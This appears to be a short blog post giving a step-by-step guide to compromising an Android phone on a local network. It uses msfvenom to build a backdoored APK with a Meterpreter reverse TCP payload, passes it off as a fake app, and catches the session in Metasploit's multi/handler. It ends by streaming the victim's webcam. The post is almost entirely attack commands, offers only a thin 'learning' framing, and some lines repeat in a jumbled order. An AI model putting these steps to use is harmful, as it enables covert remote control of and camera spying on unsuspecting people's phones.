How to Hack Android in one network
Hack Android in One Network!
Dedicated to learning!
match your Inet ‘with the command:
After fake.apk is installed, run the terminal:
Dedicated to learning!
>Watch and Learn<<First open the terminal & create the backdor.
- root@kali:~ # msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.64 lport=444 R > test.apk
match your Inet ‘with the command:
- root@kali:~ # ifconfig
After fake.apk is installed, run the terminal:
- root@kali:~ # service postgresql start
- root@kali:~ # msfconsole
- msf > use multi/handler
- msf exploit(handler) > set payload android/meterpreter/reverse_tcp
Enter lhost :
- msf exploit(handler) > set lhost
192.168.43.64
- msf exploit(handler) > set lport 444
and..
- msf exploit(handler) > exploit
- msf exploit(handler) > jobs
- msf exploit(handler) > sessions
- msf exploit(handler) > sessions 3
now..
- meterpreter > help
- meterpreter > webcam_stream
"Done here
0 Response to "How to Hack Android in one network"
Post a Comment